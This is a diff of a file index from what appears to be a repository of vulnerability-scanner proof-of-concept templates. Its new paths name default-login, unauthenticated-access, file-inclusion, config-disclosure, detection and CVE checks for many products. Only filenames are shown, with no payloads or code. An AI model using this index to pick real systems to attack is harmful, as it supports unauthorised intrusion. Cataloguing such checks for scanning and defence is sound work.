./poc/auth/feather-login-page.yaml +./poc/auth/feiyuxing-default-login.yaml ./poc/auth/fhem-6-unauthenticated-lfi.yaml ./poc/auth/fido2-auth-bypass.yaml ./poc/auth/figma-access-token.yaml @@ -3182,6 +3198,7 @@ ./poc/auth/grafana-default-login.yaml ./poc/auth/grafana-default-password.yaml ./poc/auth/grafana-default-password.yml +./poc/auth/grafana-login-check.yaml ./poc/auth/grafana-login.yml ./poc/auth/grafana-public-signup-7814.yaml ./poc/auth/grafana-public-signup-7815.yaml @@ -3624,6 +3641,7 @@ ./poc/auth/kyan-network-credentials-disclosure.yaml ./poc/auth/kyan-network-monitoring-account-password-leakage.yaml ./poc/auth/kyan-network-monitoring-account-password-leakage.yml +./poc/auth/kylin-default-login.yaml ./poc/auth/label-studio-signup.yaml ./poc/auth/labkey-server-login.yaml ./poc/auth/labkey_server.yaml @@ -3666,6 +3684,7 @@ ./poc/auth/ldap-wp-login-integration-with-active-directory-29e7a785cec44438f0ec7f51afc250b9.yaml ./poc/auth/ldap-wp-login-integration-with-active-directory.yaml ./poc/auth/ldap-wp-login-xss.yaml +./poc/auth/leostream-default-login.yaml ./poc/auth/lfi-keyed.yaml ./poc/auth/lh-password-changer-c227c958c99738e76b5b7118ffce1258.yaml ./poc/auth/lh-password-changer.yaml @@ -4054,6 +4073,7 @@ ./poc/auth/nacos-bypass-authentication.yaml ./poc/auth/nacos-core-auth-enabled-bypass.yaml ./poc/auth/nacos-create-user-unauthorized.yaml +./poc/auth/nacos-default-login.yaml ./poc/auth/nacos-default-password.yaml ./poc/auth/nacos-permission-bypass-token.yaml ./poc/auth/nacos-token-create-user.yaml @@ -4122,6 +4142,7 @@ ./poc/auth/nexus-default-password.yml ./poc/auth/nexus-repository-unauthentication.yaml ./poc/auth/nifi-api-unauthorized-access.yaml +./poc/auth/nodered-default-login.yaml ./poc/auth/noescape-login.yaml ./poc/auth/novnc-login-panel.yaml ./poc/auth/npm-access-token.yaml @@ -4470,6 +4491,7 @@ ./poc/auth/pvn-auth-popup-07f350252e6820d89f1593e944a45ac9.yaml ./poc/auth/pvn-auth-popup-927926491353dfb4182735ed34fafbc2.yaml ./poc/auth/pvn-auth-popup.yaml +./poc/auth/pyload-default-login.yaml ./poc/auth/pypi-token.yaml ./poc/auth/pypi-upload-token.yaml ./poc/auth/pyspider-unauthorized-access-9742.yaml @@ -4989,6 +5011,7 @@ ./poc/auth/sphider-login-2.yaml ./poc/auth/sphider-login-3.yaml ./poc/auth/sphider-login.yaml +./poc/auth/splunk-default-login.yaml ./poc/auth/splunk-enterprise-login-panel.yaml ./poc/auth/splunk-enterprise-login-panel.yml ./poc/auth/splunk-login-10416.yaml @@ -5116,6 +5139,7 @@ ./poc/auth/tensorboard-unauth.yml ./poc/auth/terramaster-login-10713.yaml ./poc/auth/terramaster-login.yaml +./poc/auth/teslamate-unauth-access.yaml ./poc/auth/theme-my-login-30153aa5a56c5e3aeca98d0e663457f2.yaml ./poc/auth/theme-my-login-3792ca75cbb326e50cce549d5389e9b6.yaml ./poc/auth/theme-my-login-c0adcf17190736222b76d990855c6100.yaml @@ -5147,6 +5171,7 @@ ./poc/auth/tomcat-manager-default-creds.yaml ./poc/auth/tongda-arbitrary-login.yaml ./poc/auth/tongda-auth-bypass.yaml +./poc/auth/tongda-meeting-unauth.yaml ./poc/auth/tongda-meeting-unauthorized-access.yaml ./poc/auth/tongda-meeting-unauthorized-access.yml ./poc/auth/tongda-meeting-unauthorizedAccess.yaml @@ -5259,6 +5284,7 @@ ./poc/auth/unauth-xproxy-dashboard-10968.yaml ./poc/auth/unauth-xproxy-dashboard-10969.yaml ./poc/auth/unauth-xproxy-dashboard.yaml +./poc/auth/unauth-ztp-ping.yaml ./poc/auth/unauth-zwave-mqtt.yaml ./poc/auth/unauthen-elastic.yaml ./poc/auth/unauthen-kibana.yaml @@ -5443,6 +5469,7 @@ ./poc/auth/wcc-seo-keyword-research-ff9293ba28748efa2ab9a2fe77385468.yaml ./poc/auth/wcc-seo-keyword-research.yaml ./poc/auth/weaver-login-sessionkey.yaml +./poc/auth/weaver-userselect-unauth.yaml ./poc/auth/web3-authentication-1e11e30ee0e1d20c48c7c5d6db4be9a6.yaml ./poc/auth/web3-authentication-53a207cc153af27c7b9bc24ea25dfec1.yaml ./poc/auth/web3-authentication.yaml @@ -5690,6 +5717,7 @@ ./poc/auth/xxljob-default-login-11713.yaml ./poc/auth/xxljob-default-login-11714.yaml ./poc/auth/xxljob-default-login.yaml +./poc/auth/xxljob-executor-unauth.yaml ./poc/auth/yealink-default-login.yaml ./poc/auth/yealinkpreauthrce(1).yaml ./poc/auth/yith-custom-login-9828ed878d121d268e86215520b51df0.yaml @@ -6872,6 +6900,7 @@ ./poc/cisco/cisco-vmanage-log4j.yaml ./poc/cisco/cisco-vmanage-login.yaml ./poc/cisco/cisco-vpn-FileRead.yaml +./poc/cisco/cisco-webex-log4j-rce.yaml ./poc/cisco/cisco-webex.yaml ./poc/cisco/cisco-webvpn-detect.yaml ./poc/cisco/cisco_asa_xss.yaml @@ -7578,6 +7607,7 @@ ./poc/config/openid-config.yaml ./poc/config/openssh-server-weak-config.yaml ./poc/config/openssh-sshd-config-disclosure.yaml +./poc/config/openstack-config.yaml ./poc/config/oracle-ebs-config-disclosure.yaml ./poc/config/ovpn-config-exposed.yaml ./poc/config/owncloud-config-9419.yaml @@ -7743,6 +7773,7 @@ ./poc/config/wamp-server-configuration.yaml ./poc/config/wanhu-ezoffice-teleconferenceservice-xxe.yaml ./poc/config/wanhu-oa-tele-conference-service-xxe.yaml +./poc/config/weaver-mysql-config-info-leak.yaml ./poc/config/web-config-11123.yaml ./poc/config/web-config-11124.yaml ./poc/config/web-config-11125.yaml @@ -7820,6 +7851,7 @@ ./poc/config/wp-engine-config.yaml ./poc/config/wp-misconfig.yaml ./poc/config/wp-setup-config.yaml +./poc/config/wp-superstorefinder-misconfig.yaml ./poc/config/wpconfig-aws-keys-1.yaml ./poc/config/wpconfig-aws-keys-2.yaml ./poc/config/wpconfig-aws-keys.yaml @@ -13998,6 +14030,7 @@ ./poc/cve/CVE-2019-25152-72081e24ce32b3d7a0640320e699b222.yaml ./poc/cve/CVE-2019-25152.yaml ./poc/cve/CVE-2019-25212-cf8915aa91ee39b2dc6d30f9dfffa142.yaml +./poc/cve/CVE-2019-25212.yaml ./poc/cve/CVE-2019-2578-1.yaml ./poc/cve/CVE-2019-2578-2.yaml ./poc/cve/CVE-2019-2578.yaml @@ -29542,6 +29575,7 @@ ./poc/cve/CVE-2023-4691.yaml ./poc/cve/CVE-2023-4703-abd33185e9a1cfe9176774cce9a1e2d3.yaml ./poc/cve/CVE-2023-4703.yaml +./poc/cve/CVE-2023-47115.yaml ./poc/cve/CVE-2023-47117.yaml ./poc/cve/CVE-2023-4714.yaml ./poc/cve/CVE-2023-4716-655d9958a5cab4adddedde4d3fd794d9.yaml @@ -35138,6 +35172,7 @@ ./poc/cve/CVE-2024-27197-2b9c0f9b3d20544f3ca6999a372f0770.yaml ./poc/cve/CVE-2024-27197.yaml ./poc/cve/CVE-2024-27198.yaml +./poc/cve/CVE-2024-27199.yaml ./poc/cve/CVE-2024-2729-35dcecd27cee02c251e12e5eea0d0803.yaml ./poc/cve/CVE-2024-2729.yaml ./poc/cve/CVE-2024-2732-9d655b618953c1afda60e6f30252668e.yaml @@ -41424,6 +41459,7 @@ ./poc/cve/CVE-2024-5382-3f1ae151e74bf3a85689b92b47a722f8.yaml ./poc/cve/CVE-2024-5382.yaml ./poc/cve/CVE-2024-5416-b035cee38aeca20c0511efbe55146c96.yaml +./poc/cve/CVE-2024-5416.yaml ./poc/cve/CVE-2024-5418-434a339fc4d8515bf3d8877608840f7e.yaml ./poc/cve/CVE-2024-5418.yaml ./poc/cve/CVE-2024-5419-6c5a95dfcb26729f4b1f7034ca7aef48.yaml @@ -42021,6 +42057,7 @@ ./poc/cve/CVE-2024-6334-32cc27bdc2750532a6a94260dc479796.yaml ./poc/cve/CVE-2024-6334.yaml ./poc/cve/CVE-2024-6335-84de910af85c0afe2f599b3df45be46d.yaml +./poc/cve/CVE-2024-6335.yaml ./poc/cve/CVE-2024-6338-2cb15f594519463fb002e59f93b4f8b0.yaml ./poc/cve/CVE-2024-6338.yaml ./poc/cve/CVE-2024-6339-8aab95c35ab2f543f319207ba5af5758.yaml @@ -42552,6 +42589,7 @@ ./poc/cve/CVE-2024-7624-ebfd9e3cba7ebe22ec232d00cda9ba4f.yaml ./poc/cve/CVE-2024-7624.yaml ./poc/cve/CVE-2024-7626-6cce2d74a4b9b1a75cb8e104eb400ce1.yaml +./poc/cve/CVE-2024-7626.yaml ./poc/cve/CVE-2024-7627-89a7ba1cc9a6f6445a389a024cfcf883.yaml ./poc/cve/CVE-2024-7627.yaml ./poc/cve/CVE-2024-7628-3bb6c5b2894c843f8737291215f30580.yaml @@ -42592,7 +42630,9 @@ ./poc/cve/CVE-2024-7717-8b2d72f894c49fa210faf06966bb467e.yaml ./poc/cve/CVE-2024-7717.yaml ./poc/cve/CVE-2024-7721-dabffc45b2b1ccb0d8463248830df7d5.yaml +./poc/cve/CVE-2024-7721.yaml ./poc/cve/CVE-2024-7727-4fe4538f75c6cfd03c0ffd7da47ebf37.yaml +./poc/cve/CVE-2024-7727.yaml ./poc/cve/CVE-2024-7770-0dc95a63b6c1c6ccfca48ccb324269b5.yaml ./poc/cve/CVE-2024-7770.yaml ./poc/cve/CVE-2024-7775-cb89a9bf3c0d813debb09dc21c3f085f.yaml @@ -42659,6 +42699,7 @@ ./poc/cve/CVE-2024-8044-c5c06b8842bfb695b2f240b2af75787b.yaml ./poc/cve/CVE-2024-8044.yaml ./poc/cve/CVE-2024-8045-fae1d4f6a9ba77de83e71f29fe31f38e.yaml +./poc/cve/CVE-2024-8045.yaml ./poc/cve/CVE-2024-8046-15e0de38601f3b1bc315968586b907cd.yaml ./poc/cve/CVE-2024-8046.yaml ./poc/cve/CVE-2024-8047-f6817d306b4651cd60631b6b036a3959.yaml @@ -42706,6 +42747,7 @@ ./poc/cve/CVE-2024-8252-2918e2ad48b79ca4c8bb4e4cd2023c96.yaml ./poc/cve/CVE-2024-8252.yaml ./poc/cve/CVE-2024-8253-e2234cc208110923d0c092c69c0a152e.yaml +./poc/cve/CVE-2024-8253.yaml ./poc/cve/CVE-2024-8268-75f27436435201ac5094d8b23bf9fb95.yaml ./poc/cve/CVE-2024-8268.yaml ./poc/cve/CVE-2024-8274-bda8d98f83bd3baa9ee6eb35650a9ef1.yaml @@ -42713,6 +42755,7 @@ ./poc/cve/CVE-2024-8276-abcb50055a0fdc77a95290d651b9dbcc.yaml ./poc/cve/CVE-2024-8276.yaml ./poc/cve/CVE-2024-8277-60e40034fde9b34dd19d7bd360de5d19.yaml +./poc/cve/CVE-2024-8277.yaml ./poc/cve/CVE-2024-8289-547295faa6591e5ec09f536a86cfff13.yaml ./poc/cve/CVE-2024-8289-87a431b046b6c387f38f06ebe340c64f.yaml ./poc/cve/CVE-2024-8289.yaml @@ -42735,14 +42778,18 @@ ./poc/cve/CVE-2024-8428-3b140a48fddab0e2501d7d69c672d7cf.yaml ./poc/cve/CVE-2024-8428.yaml ./poc/cve/CVE-2024-8440-a970a1df0c7918e0736009309dc70109.yaml +./poc/cve/CVE-2024-8440.yaml ./poc/cve/CVE-2024-8478-2c5877806cf2b984d8159c04c86877bf.yaml ./poc/cve/CVE-2024-8478.yaml ./poc/cve/CVE-2024-8480-f1d8d42bfc1633b849f4ef6346a133c9.yaml ./poc/cve/CVE-2024-8480.yaml +./poc/cve/CVE-2024-8522-29b9e24c70ba3cd60461931eec1fd527.yaml +./poc/cve/CVE-2024-8529-e2a9975debb93f28e1a8c207f744d964.yaml ./poc/cve/CVE-2024-8538-001bcf7ee52037e79f6a696add474366.yaml ./poc/cve/CVE-2024-8538.yaml ./poc/cve/CVE-2024-8543-0a87e99d4b00c51f4b0142f0f5daaa10.yaml ./poc/cve/CVE-2024-8543.yaml +./poc/cve/CVE-2024-8622-0703e404cdba311680d3e36cfe2a24e3.yaml ./poc/cve/CVE_2023_49442.yaml ./poc/cve/CVE_2023_51467.yaml ./poc/cve/CVE_2024_0195.yaml @@ -50765,6 +50812,7 @@ ./poc/default/azure-default-page.yaml ./poc/default/batflat-default-login.yaml ./poc/default/bithighway-default-password.yaml +./poc/default/bloofoxcms-default-login.yaml ./poc/default/businessintelligence-default-login-814.yaml ./poc/default/businessintelligence-default-login-815.yaml ./poc/default/businessintelligence-default-login-816.yaml @@ -50815,11 +50863,13 @@ ./poc/default/custom-grafana-default-login.yaml ./poc/default/custom-rabbit-mq-default-login.yaml ./poc/default/d-link-ac-centralized-management-system-default-login.yaml +./poc/default/dataease-default-login.yaml ./poc/default/datahub-metadata-default-login.yaml ./poc/default/dataiku-default-login.yaml ./poc/default/datang-ac-default-password-cnvd-2021-04128.yaml ./poc/default/datang-ac-default-password-cnvd-2021-04128.yml ./poc/default/datang-ac-default-password.yaml +./poc/default/default-apache-shiro.yaml ./poc/default/default-apache-test-all-6812.yaml ./poc/default/default-apache-test-all-6813.yaml ./poc/default/default-apache-test-all-6814.yaml @@ -51024,6 +51074,7 @@ ./poc/default/dvwa-default-login-7128.yaml ./poc/default/dvwa-default-login-7129.yaml ./poc/default/dvwa-default-login.yaml +./poc/default/elasticsearch-default-login.yaml ./poc/default/elasticsearch-insecure-default-config.yaml ./poc/default/emcecom-default-login-7211.yaml ./poc/default/emcecom-default-login-7212.yaml @@ -51034,6 +51085,7 @@ ./poc/default/emqx-default-login-7221.yaml ./poc/default/emqx-default-login-7222.yaml ./poc/default/emqx-default-login.yaml +./poc/default/esafenet-cdg-default-login.yaml ./poc/default/esafenet-cdgserver3-systemconfig-default-password.yaml ./poc/default/etl3100-default-login.yaml ./poc/default/exacqvision-default-credentials.yaml @@ -51044,6 +51096,7 @@ ./poc/default/exacqvision-default-login.yaml ./poc/default/exacqvision-default-password.yaml ./poc/default/express-default-page.yaml +./poc/default/feiyuxing-default-login.yaml ./poc/default/flir-ax8-default-credentials-7512.yaml ./poc/default/flir-ax8-default-credentials.yaml ./poc/default/flir-default-login-7513.yaml @@ -51192,7 +51245,9 @@ ./poc/default/known-default-account.yaml ./poc/default/konga-default-jwt-key.yaml ./poc/default/konga-default-login.yaml +./poc/default/kylin-default-login.yaml ./poc/default/ldap-default-creds.yaml +./poc/default/leostream-default-login.yaml ./poc/default/lighttpd-default-8627.yaml ./poc/default/lighttpd-default-8628.yaml ./poc/default/lighttpd-default.yaml @@ -51231,6 +51286,7 @@ ./poc/default/mofi4500-default-password.yaml ./poc/default/mssql-default-logins.yaml ./poc/default/mysql-default-login.yaml +./poc/default/nacos-default-login.yaml ./poc/default/nacos-default-password.yaml ./poc/default/nagios-default-credential-8988.yaml ./poc/default/nagios-default-credential-8989.yaml @@ -51258,6 +51314,7 @@ ./poc/default/nexus-default-password-9091.yaml ./poc/default/nexus-default-password.yaml ./poc/default/nexus-default-password.yml +./poc/default/nodered-default-login.yaml ./poc/default/nps-default-login-9142.yaml ./poc/default/nps-default-login-9143.yaml ./poc/default/nps-default-login-9144.yaml @@ -51333,6 +51390,7 @@ ./poc/default/postgres-default-logins.yaml ./poc/default/powerjob-default-login.yaml ./poc/default/prtg-default-login.yaml +./poc/default/pyload-default-login.yaml ./poc/default/rabbitmq-default-admin-9780.yaml ./poc/default/rabbitmq-default-admin-9781.yaml ./poc/default/rabbitmq-default-admin-9782.yaml @@ -51441,6 +51499,7 @@ ./poc/default/spectracom-default-login-10406.yaml ./poc/default/spectracom-default-login.yaml ./poc/default/spectracom-default-password.yaml +./poc/default/splunk-default-login.yaml ./poc/default/ssh-default-logins.yaml ./poc/default/stackstorm-default-login-10529.yaml ./poc/default/stackstorm-default-login-10530.yaml @@ -51754,6 +51813,7 @@ ./poc/detect/azure-takeover-detection.yaml ./poc/detect/azure-takeover-detection.yml ./poc/detect/b2b-builder-detect.yaml +./poc/detect/bamboo-detect.yaml ./poc/detect/basic-auth-detect.yaml ./poc/detect/basic-auth-detection-687.yaml ./poc/detect/basic-auth-detection-688.yaml @@ -51808,6 +51868,7 @@ ./poc/detect/burp-api-detect-812.yaml ./poc/detect/burp-api-detect-813.yaml ./poc/detect/burp-api-detect.yaml +./poc/detect/burp-collaborator-detect.yaml ./poc/detect/cacti-detect-1.yaml ./poc/detect/cacti-detect-2.yaml ./poc/detect/cacti-detect-826.yaml @@ -51819,6 +51880,7 @@ ./poc/detect/carestream-vue-detect-860.yaml ./poc/detect/carestream-vue-detect-861.yaml ./poc/detect/carestream-vue-detect.yaml +./poc/detect/casaos-detection.yaml ./poc/detect/catalog-creator-detect.yaml ./poc/detect/ccm-detect.yaml ./poc/detect/celebrus-detect.yaml @@ -51828,6 +51890,7 @@ ./poc/detect/centreon-detect.yaml ./poc/detect/changedetection-panel.yaml ./poc/detect/chatgpt-next-detection.yaml +./poc/detect/checkpoint-mobile-detect.yaml ./poc/detect/chevereto-detect-904.yaml ./poc/detect/chevereto-detect-905.yaml ./poc/detect/chevereto-detect.yaml @@ -51835,6 +51898,7 @@ ./poc/detect/chp-ads-block-detector-b7efff873ee4bed005e48f45da9d3636.yaml ./poc/detect/chp-ads-block-detector-dba98e5ea73e2f1d6a07c9c27a108767.yaml ./poc/detect/chp-ads-block-detector.yaml +./poc/detect/chromecast-detect.yaml ./poc/detect/cisco-asa-honeypot-detection.yaml ./poc/detect/cisco-email-security-detect.yaml ./poc/detect/cisco-finger-detect.yaml @@ -51947,6 +52011,7 @@ ./poc/detect/custom-weblogic-SSRF-detect.yaml ./poc/detect/custom-wps-proxy-ssrf-detect.yaml ./poc/detect/cvent-panel-detect.yaml +./poc/detect/cvsweb-detect.yaml ./poc/detect/cx-cloud-upload-detect-6766.yaml ./poc/detect/cx-cloud-upload-detect.yaml ./poc/detect/darkstat-detect-1.yaml @@ -52047,6 +52112,7 @@ ./poc/detect/dionaea-mysql-honeypot-detect.yaml ./poc/detect/dionaea-smb-honeypot-detect.yaml ./poc/detect/dionaea-smb-honeypot-detection.yaml +./poc/detect/directus-detect.yaml ./poc/detect/django-debug-detect-7024.yaml ./poc/detect/django-debug-detect-7025.yaml ./poc/detect/django-debug-detect-7026.yaml @@ -52099,6 +52165,7 @@ ./poc/detect/elasticsearch-sql-client-detect.yaml ./poc/detect/electron-version-detect-7198.yaml ./poc/detect/electron-version-detect.yaml +./poc/detect/element-web-detect.yaml ./poc/detect/elfinder-detect-1.yaml ./poc/detect/elfinder-detect-2.yaml ./poc/detect/elfinder-detect-7201.yaml @@ -52338,6 +52405,7 @@ ./poc/detect/icecast-mediaserver-detect.yaml ./poc/detect/icecast-server-detect.yaml ./poc/detect/icewarp-panel-detect.yaml +./poc/detect/identity-server-v3-detect.yaml ./poc/detect/iis-detect.yaml ./poc/detect/iis-errorpage-detection-all-lang.yaml ./poc/detect/ilo-detect-8154.yaml @@ -52459,6 +52527,7 @@ ./poc/detect/liferay-portal-detect-8626.yaml ./poc/detect/liferay-portal-detect.yaml ./poc/detect/lightdash-detect.nuclei.yaml +./poc/detect/limesurvey-detect.yaml ./poc/detect/linkerd-badrule-detect-8629.yaml ./poc/detect/linkerd-badrule-detect-8630.yaml ./poc/detect/linkerd-badrule-detect-8631.yaml @@ -52509,6 +52578,7 @@ ./poc/detect/mantis-detect-8781.yaml ./poc/detect/mantis-detect.yaml ./poc/detect/matrix-detect.yaml +./poc/detect/matrix-homeserver-detect.yaml ./poc/detect/mautic-crm-detect-8787.yaml ./poc/detect/mautic-crm-detect-8788.yaml ./poc/detect/mautic-crm-detect.yaml @@ -52702,6 +52772,7 @@ ./poc/detect/openethereum-server-detect.yaml ./poc/detect/opengear-detect.yaml ./poc/detect/openhap-detect.yaml +./poc/detect/openproject-detect.yaml ./poc/detect/openresty-detect.yaml ./poc/detect/opensis-detect-1.yaml ./poc/detect/opensis-detect-2.yaml @@ -52752,6 +52823,7 @@ ./poc/detect/phpcollab-detect-9500.yaml ./poc/detect/phpcollab-detect-9501.yaml ./poc/detect/phpcollab-detect.yaml +./poc/detect/phplist-detect.yaml ./poc/detect/phpmyadmin-version-detect.yaml ./poc/detect/phpmyadmin-version-detection.yaml ./poc/detect/pi-hole-detect-9580.yaml @@ -53056,6 +53128,7 @@ ./poc/detect/thinkphp-debug-detected.yaml ./poc/detect/thinkphp-detect.yaml ./poc/detect/thruk-detect.yaml +./poc/detect/tibco-businessconnect-detect.yaml ./poc/detect/tibco-spotfire-services-detect.yaml ./poc/detect/tingsboard-detect.yaml ./poc/detect/tomcat-detect-10792.yaml @@ -53184,6 +53257,7 @@ ./poc/detect/widget-detector-elementor-cb9fa42d925b49c26314653a0263606c.yaml ./poc/detect/widget-detector-elementor.yaml ./poc/detect/wing-ftp-detect.yaml +./poc/detect/wing-ftp-service-detect.yaml ./poc/detect/wms-server-detect.yaml ./poc/detect/wondercms-detect-11221.yaml ./poc/detect/wondercms-detect-11222.yaml @@ -53319,6 +53393,7 @@ ./poc/directory_listing/ecology-filedownload-directory-traversal.yaml ./poc/directory_listing/ecology-filedownload-directory-traversal.yml ./poc/directory_listing/ecology-jqueryfiletree-directory-traversal.yaml +./poc/directory_listing/ecology-jqueryfiletree-traversal.yaml ./poc/directory_listing/ecology-springframework-directory-traversal-7173.yaml ./poc/directory_listing/ecology-springframework-directory-traversal-7174.yaml ./poc/directory_listing/ecology-springframework-directory-traversal-7175.yaml @@ -53949,6 +54024,7 @@ ./poc/elk/elasticsearch-cve-2015-3337-lfi.yml ./poc/elk/elasticsearch-cve-2015-5531.yaml ./poc/elk/elasticsearch-cve-2015-5531.yml +./poc/elk/elasticsearch-default-login.yaml ./poc/elk/elasticsearch-insecure-default-config.yaml ./poc/elk/elasticsearch-log4j.yaml ./poc/elk/elasticsearch-sql-client-detect-7189.yaml @@ -54469,6 +54545,7 @@ ./poc/exposed/grafana-datasource-credentials-exposure.yml ./poc/exposed/grafana-exposed-configuration.yaml ./poc/exposed/graphql-playground-exposure.yaml +./poc/exposed/graylog-api-exposure.yaml ./poc/exposed/graylog-config-exposure.yml ./poc/exposed/graylog-endpoints-exposure.yaml ./poc/exposed/gruntfile-exposure-1.yaml @@ -54695,6 +54772,7 @@ ./poc/exposed/rails-secret-token-disclosure-9809.yaml ./poc/exposed/rails-secret-token-disclosure-9810.yaml ./poc/exposed/rails-secret-token-disclosure.yaml +./poc/exposed/rakefile-disclosure.yaml ./poc/exposed/razorpay-clientid-disclosure.yaml ./poc/exposed/redis-commander-exposure-9851.yaml ./poc/exposed/redis-commander-exposure.yaml @@ -54780,6 +54858,7 @@ ./poc/exposed/solr-exposure.yaml ./poc/exposed/solr-panel-exposure.yaml ./poc/exposed/sonarqube-config-exposure.yml +./poc/exposed/sonarqube-projects-disclosure.yaml ./poc/exposed/sonatype-nexus-config-exposure.yml ./poc/exposed/sony-bravia-disclosure.yaml ./poc/exposed/sound4-file-disclosure.yaml @@ -54830,8 +54909,10 @@ ./poc/exposed/unigui-server-monitor-exposure.yaml ./poc/exposed/v2boardv161-exposure.yaml ./poc/exposed/vagrantfile-exposure.yaml +./poc/exposed/vbulletin-path-disclosure.yaml ./poc/exposed/venustech-4a-getMaster-disclosure.yaml ./poc/exposed/vercel-source-exposure.yaml +./poc/exposed/viminfo-disclosure.yaml ./poc/exposed/vpc-endpoint-exposed.yaml ./poc/exposed/wallet-recovery-phrase-disclosure.yml ./poc/exposed/watchguard-credentials-disclosure-11105.yaml @@ -54897,6 +54978,7 @@ ./poc/exposed/zipkin-exposure-11822.yaml ./poc/exposed/zipkin-exposure-2.yaml ./poc/exposed/zipkin-exposure.yaml +./poc/exposed/zzzcms-info-disclosure.yaml ./poc/extract/cookie-extractor.yaml ./poc/extract/drupal_module-file_extractor-arbitrary-php-code-execution.yaml ./poc/extract/email-extraction-7210.yaml @@ -55119,6 +55201,7 @@ ./poc/ftp/web-ftp-detect.yaml ./poc/ftp/wing-ftp-detect.yaml ./poc/ftp/wing-ftp-server.yaml +./poc/ftp/wing-ftp-service-detect.yaml ./poc/ftp/wordpress-updraftplus-pem-key-11325.yaml ./poc/ftp/wordpress-updraftplus-pem-key-11326.yaml ./poc/ftp/wordpress-updraftplus-pem-key-11327.yaml @@ -57111,6 +57194,7 @@ ./poc/java/custom-jreport-admin-creds.yaml ./poc/java/custom-mapview-jsp-detect.yaml ./poc/java/custom-weblogic-SSRF-detect.yaml +./poc/java/default-apache-shiro.yaml ./poc/java/default-glassfish-server-page-6852.yaml ./poc/java/default-glassfish-server-page-6853.yaml ./poc/java/default-glassfish-server-page-6854.yaml @@ -57671,6 +57755,7 @@ ./poc/javascript/css-js-manager.yaml ./poc/javascript/custom-css-js-705d050c5e0c5c96bf187eb782493157.yaml ./poc/javascript/custom-css-js-php-38595c300b5439c3ff06f9de9b42f302.yaml +./poc/javascript/custom-css-js-php.yaml ./poc/javascript/custom-css-js.yaml ./poc/javascript/custom-mapview-jsp-detect.yaml ./poc/javascript/cve2json.yml @@ -58379,6 +58464,7 @@ ./poc/local_file_inclusion/accent-microcomputers-lfi-16.yaml ./poc/local_file_inclusion/accent-microcomputers-lfi-17.yaml ./poc/local_file_inclusion/accent-microcomputers-lfi.yaml +./poc/local_file_inclusion/acti-video-lfi.yaml ./poc/local_file_inclusion/ad-widget-lfi-124.yaml ./poc/local_file_inclusion/ad-widget-lfi-125.yaml ./poc/local_file_inclusion/ad-widget-lfi-126.yaml @@ -58603,6 +58689,7 @@ ./poc/local_file_inclusion/karel-ip-phone-lfi.yaml ./poc/local_file_inclusion/karenderia-cms-lfi.yaml ./poc/local_file_inclusion/kavita-lfi.yaml +./poc/local_file_inclusion/kingsoft-vgm-lfi.yaml ./poc/local_file_inclusion/kyocera-m2035dn-lfi-8557.yaml ./poc/local_file_inclusion/kyocera-m2035dn-lfi-8558.yaml ./poc/local_file_inclusion/kyocera-m2035dn-lfi-8559.yaml @@ -58744,6 +58831,7 @@ ./poc/local_file_inclusion/samsung-wlan-ap-lfi-9998.yaml ./poc/local_file_inclusion/samsung-wlan-ap-lfi-9999.yaml ./poc/local_file_inclusion/samsung-wlan-ap-lfi.yaml +./poc/local_file_inclusion/sangfor-ngaf-lfi.yaml ./poc/local_file_inclusion/schneider-electric-pelco-videoxpert-core-admin-portal-lfi.yaml ./poc/local_file_inclusion/seeyon-analyticscloud-lfi.yaml ./poc/local_file_inclusion/selea-targa-camera-lfi.yaml @@ -58812,6 +58900,9 @@ ./poc/local_file_inclusion/vmware-vcenter-lfi-linux.yaml ./poc/local_file_inclusion/vmware-vcenter-lfi.yaml ./poc/local_file_inclusion/wapples-firewall-lfi.yaml +./poc/local_file_inclusion/weaver-officeserver-lfi.yaml +./poc/local_file_inclusion/weaver-signaturedownload-lfi.yaml +./poc/local_file_inclusion/weaver-sptmforportalthumbnail-lfi.yaml ./poc/local_file_inclusion/webp-server-go-lfi.yaml ./poc/local_file_inclusion/windows-lfi-fuzz.yaml ./poc/local_file_inclusion/wordpress-LFI.yaml @@ -58908,6 +58999,7 @@ ./poc/local_file_inclusion/yishaadmin-lfi-11744.yaml ./poc/local_file_inclusion/yishaadmin-lfi.yaml ./poc/local_file_inclusion/yonyou-nc-printbill-lfi.yaml +./poc/local_file_inclusion/yonyou-ufida-nc-lfi.yaml ./poc/local_file_inclusion/zendrop-dropshipping-and-fulfillment-2fe6949ea942d8a3b7779bc5ccf17f38.yaml ./poc/local_file_inclusion/zendrop-dropshipping-and-fulfillment-d55b65118444e2b38ff7422e4f9db780.yaml ./poc/local_file_inclusion/zendrop-dropshipping-and-fulfillment.yaml @@ -58987,6 +59079,7 @@ ./poc/microsoft/74cms-sqli.yaml ./poc/microsoft/74cms-sqli.yml ./poc/microsoft/74cms-v3-Boolean-injection.yaml +./poc/microsoft/74cms-weixin-sqli.yaml ./poc/microsoft/74cms-workflow.yaml ./poc/microsoft/74cms-xss.yaml ./poc/microsoft/74cms.yaml @@ -59192,6 +59285,7 @@ ./poc/microsoft/block-styler-for-gravity-forms-322a86f28cc5049106653fa64c408640.yaml ./poc/microsoft/block-styler-for-gravity-forms-6477bf18cad6c823db485408d49b337b.yaml ./poc/microsoft/block-styler-for-gravity-forms.yaml +./poc/microsoft/bloofoxcms-default-login.yaml ./poc/microsoft/bloofoxcms-login-panel.yaml ./poc/microsoft/bloofoxcms.yaml ./poc/microsoft/bolt-cms-detect-759.yaml @@ -60975,6 +61069,7 @@ ./poc/microsoft/zzcms-zsmanage-sqli.yaml ./poc/microsoft/zzcms-zsmanage-sqli.yml ./poc/microsoft/zzcms.yaml +./poc/microsoft/zzzcms-info-disclosure.yaml ./poc/microsoft/zzzcms-parser-search-rce.yaml ./poc/microsoft/zzzcms-ssrf.yaml ./poc/microsoft/zzzcms-workflow.yaml @@ -61056,6 +61151,7 @@ ./poc/mysql/mysql-detect.yaml ./poc/mysql/mysql-dump-files.yaml ./poc/mysql/mysql-empty-password.yaml +./poc/mysql/mysql-history.yaml ./poc/mysql/mysql-info.yaml ./poc/mysql/mysql-load-file.yaml ./poc/mysql/mysql-my-cnf-disclosure.yaml @@ -61074,6 +61170,7 @@ ./poc/mysql/seeyon-a6-createmysql-disclosure.yaml ./poc/mysql/seeyon-oa-a6-createmysql-infoleak.yaml ./poc/mysql/unrestricted-sg-ingress-mysql-port.yaml +./poc/mysql/weaver-mysql-config-info-leak.yaml ./poc/netlify/api-netlify-470.yaml ./poc/netlify/api-netlify.yaml ./poc/netlify/netlify-cms-9039.yaml @@ -61271,6 +61368,7 @@ ./poc/nodejs/node-red-workflow.yaml ./poc/nodejs/nodebb-installer.yaml ./poc/nodejs/nodebb.yaml +./poc/nodejs/nodered-default-login.yaml ./poc/nodejs/npm-access-token.yaml 